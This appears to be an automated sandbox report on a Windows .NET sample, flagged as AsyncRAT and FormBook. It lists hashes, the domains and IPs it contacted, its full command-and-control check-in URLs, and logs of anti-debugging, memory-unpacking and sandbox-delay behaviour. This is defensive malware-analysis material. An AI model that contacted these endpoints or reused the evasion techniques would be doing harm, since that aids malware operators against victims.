Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 17, 2021, 7:45 a.m.	Nov. 17, 2021, 7:52 a.m.

Size	461.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`8cec5b455b359860f5a7aa647331783f`
SHA256	`29cec08e007fcd2217b0bd25adf7e58e019d4d4c32de795aae95390e4f530c4f`
CRC32	`9533D3B9`
ssdeep	`12288:s4G7lAzHa+7nEGOzfForhL2Qxsyrs5Ow5:sKzHazfOt2Ysyo5Ow`
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware IsPE32 - (no description) Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

mode-cry.exe "C:\Users\test22\AppData\Local\Temp\mode-cry.exe"
2768
- mode-cry.exe "C:\Users\test22\AppData\Local\Temp\mode-cry.exe"
  2148

Name	Response	Post-Analysis Lookup
www.dsknit.com	CNAME dsknit.com A 50.62.168.3	50.62.168.3
www.gdmo112.com	A 198.50.252.64	198.50.252.64
www.abetttermountbethel.com	CNAME abetttermountbethel.com A 34.102.136.180	34.102.136.180
www.idaivos.com
www.smokersoutletinc.com	A 166.88.19.180 A 68.68.98.160 A 166.88.19.181	166.88.19.180
www.publicitysocial.com
www.salomesac.com	A 198.23.62.250 CNAME salomesac.com	198.23.62.250
www.makingitreignz.com	A 198.54.117.218 A 198.54.117.216 A 198.54.117.217 CNAME parkingpage.namecheap.com A 198.54.117.215 A 198.54.117.212 A 198.54.117.210 A 198.54.117.211	198.54.117.218
www.dgredg.com	A 108.186.180.80	108.186.180.80
www.ceramicfinishing.com	CNAME ceramicfinishing.com A 34.102.136.180	34.102.136.180

IP Address	Status	Action
108.186.180.80	Active	Moloch
164.124.101.2	Active	Moloch
166.88.19.180	Active	Moloch
198.23.62.250	Active	Moloch
198.50.252.64	Active	Moloch
198.54.117.215	Active	Moloch
34.102.136.180	Active	Moloch
50.62.168.3	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49170 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 198.23.62.250:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 198.23.62.250:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 198.23.62.250:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 198.54.117.215:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 198.54.117.215:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 198.54.117.215:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 50.62.168.3:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 50.62.168.3:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 50.62.168.3:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 198.50.252.64:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 198.50.252.64:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 198.50.252.64:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 108.186.180.80:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 108.186.180.80:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 108.186.180.80:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 166.88.19.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 166.88.19.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 166.88.19.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (50 out of 239 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0
IsDebuggerPresent Nov. 17, 2021, 7:45 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 17, 2021, 7:45 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (8 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.salomesac.com/n58i/?BRjh4N=aZfo+S27NrbfQQhEr8v2KchNwgf0tHTkYwom9YPvjlEyQeeVCfyp9AG6dFYVWO2tY8aKQlCW&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.abetttermountbethel.com/n58i/?BRjh4N=N7DE5u1U4fOL0ilborjUwsLvYfOzBR0FDt/+0a2DezgJKO4tm6ThJVxI8l7XCkIcO9hMk87n&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.smokersoutletinc.com/n58i/?BRjh4N=5UXjEy3qtPasRjwirbU21i6O37Lor1jWu2m05Me1/8+sn2gOcdu+xcYhHiP/jpkJNBOmhhuo&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.makingitreignz.com/n58i/?BRjh4N=U3jsdgp8CDPcVzUFF4v7nlk0sWC9y6sI+RhE9xOYErFVjtQIs/TTt3K+xGjNiiNAejKA27CK&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.dgredg.com/n58i/?BRjh4N=1Lq7LF0ntItHTNtmIzwdP1Lf7WzIxIJFH3MjbUP9GZ27RfoHQ26Ib5y2lTwDxLgwc9rt6MSP&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.ceramicfinishing.com/n58i/?BRjh4N=+Rs7EkKJ9nC5R4pSEiT2YngIN36piw3al8LxLxiH96aUukE+tfuosgB2nCpI+NLBjM8PJX0q&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.gdmo112.com/n58i/?BRjh4N=wicQen1ff3fRM08VnZMTzPtaRw1xTvZDFcZ4henDOdH9UHSkNu/mptd4xDAE6swP9J849hZG&J46Tz=ARm8z0AXOho0l0p0
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.dsknit.com/n58i/?BRjh4N=SoKM3gHEWCBWgdUJzSLCKeauc0V37QuEskfBqIKKO1rm+wpQUSSqpp7kY0wxGvSqaTO25VSq&J46Tz=ARm8z0AXOho0l0p0

Performs some HTTP requests (8 events)

request	GET http://www.salomesac.com/n58i/?BRjh4N=aZfo+S27NrbfQQhEr8v2KchNwgf0tHTkYwom9YPvjlEyQeeVCfyp9AG6dFYVWO2tY8aKQlCW&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.abetttermountbethel.com/n58i/?BRjh4N=N7DE5u1U4fOL0ilborjUwsLvYfOzBR0FDt/+0a2DezgJKO4tm6ThJVxI8l7XCkIcO9hMk87n&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.smokersoutletinc.com/n58i/?BRjh4N=5UXjEy3qtPasRjwirbU21i6O37Lor1jWu2m05Me1/8+sn2gOcdu+xcYhHiP/jpkJNBOmhhuo&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.makingitreignz.com/n58i/?BRjh4N=U3jsdgp8CDPcVzUFF4v7nlk0sWC9y6sI+RhE9xOYErFVjtQIs/TTt3K+xGjNiiNAejKA27CK&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.dgredg.com/n58i/?BRjh4N=1Lq7LF0ntItHTNtmIzwdP1Lf7WzIxIJFH3MjbUP9GZ27RfoHQ26Ib5y2lTwDxLgwc9rt6MSP&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.ceramicfinishing.com/n58i/?BRjh4N=+Rs7EkKJ9nC5R4pSEiT2YngIN36piw3al8LxLxiH96aUukE+tfuosgB2nCpI+NLBjM8PJX0q&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.gdmo112.com/n58i/?BRjh4N=wicQen1ff3fRM08VnZMTzPtaRw1xTvZDFcZ4henDOdH9UHSkNu/mptd4xDAE6swP9J849hZG&J46Tz=ARm8z0AXOho0l0p0
request	GET http://www.dsknit.com/n58i/?BRjh4N=SoKM3gHEWCBWgdUJzSLCKeauc0V37QuEskfBqIKKO1rm+wpQUSSqpp7kY0wxGvSqaTO25VSq&J46Tz=ARm8z0AXOho0l0p0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 58 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72e32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00620000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00861000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00863000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00869000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02081000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02086000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02130000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02131000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02136000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02137000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02150000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02151000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02156000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02157000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 17, 2021, 7:45 a.m.	process_identifier: 2768 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

mode-cry.exe tried to sleep 266 seconds, actually delayed analysis time by 266 seconds

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

